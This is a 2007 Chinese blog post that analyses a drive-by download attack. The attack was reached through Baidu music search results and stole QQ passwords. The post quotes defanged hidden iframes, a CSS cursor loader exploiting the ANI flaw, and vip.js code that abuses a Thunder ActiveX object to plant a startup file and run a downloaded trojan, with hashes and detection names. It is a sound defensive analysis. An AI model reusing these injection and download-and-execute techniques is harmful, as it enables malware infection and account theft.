小心！用baidu搜索 得了音乐 失了QQ 原来搭送了Trojan.PSW.Win32.QQPass.qis

endurer 原创
2007-07-01 第1版

有一位网友反映，他用baidu搜索音乐，打开搜索结果中的链接网页后，QQ号被盗~

BTW，偶找音乐都是用sogou的~

检查网友提供的这个网页，发现包含代码：

/---
＜iframe src='hxxp://w**.c**yshop.net/gg.html?id=101' width=0 height=0＞＜/iframe＞
---/

hxxp://w**.c**yshop.net/gg.html?id=101中包含三段恶意代码。

一、US-ASCII 编码的内容

到 http://purpleendurer.ys168.com 下载 US-ASCII 编码解码器进行解码，得到一段HTML代码：

/---
＜BODY style='CURSOR: url(hxxp://*q*.16***80*8*0.com/w.js)'＞
＜/BODY＞
---/

w.js 利用 ANI 漏洞 下载 hxxp://w**.d**zy5***20.com/0.exe

文件说明符 : D:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-7-1 21:55:38
修改时间 : 2007-7-1 21:55:44
访问时间 : 2007-7-1 0:0:0
大小 : 22807 字节 22.279 KB
MD5 : 08a5179fc115b3ace5c9a4ac55ed4c44
Kaspersky 报为 Trojan-PSW.Win32.Delf.qc，瑞星报为 Trojan.PSW.Win32.QQPass.qis

二、HTML代码：
/---
＜iframe src="hxxp://q**.z**p*x5**2*0.com/1.htm" width=0 height=0＞＜/iframe＞
---/

1.htm 的内容使用了 US-ASCII 编码，解码，得到一段JavaScript代码，功能同样是下载 上面这个0.exe

三、HTML代码：
/---
＜iframe src="hxxp://q**.z**p*x5**2*0.com/vip.htm" width=0 height=0＞＜/iframe＞
---/

hxxp://q**.z**p*x5**2*0.com/vip.htm 内容为：
/---
＜SCRIPT src="vip.js"＞＜/SCRIPT＞
＜BODY onload=shit();＞＜BR＞＜BR＞
---/
shit()定义在vip.js中：
/---
function shit（）
｛
 try｛qianxu＿fan ＝ new ActiveXObject(＂ThunderServer．webThunder.1＂）；｝
 catch（e）｛return;｝
---/
用来创建ActiveX Object：ThunderServer.webThunder.1。

vip.js 利用它来的实施：
利用ADODB创建文件：C:/Documents and Settings/All Users/「开始」菜单/程序/启动/microsofts.hta
利用Shell.Run调用IE打开网页 hxxp://q**.d*z**y*5***20.com/vips.htm，下载病毒文件vip.exe
利用shell.exec运行下载到IE临时文件夹中的病毒文件vip[1].exe

hxxp://q**.d*z**y*5***20.com/vips.htm  包含代码：
/---
＜script src="vip.exe"＞＜/script＞
---/

vip.exe 与 上面的 0.exe 相同。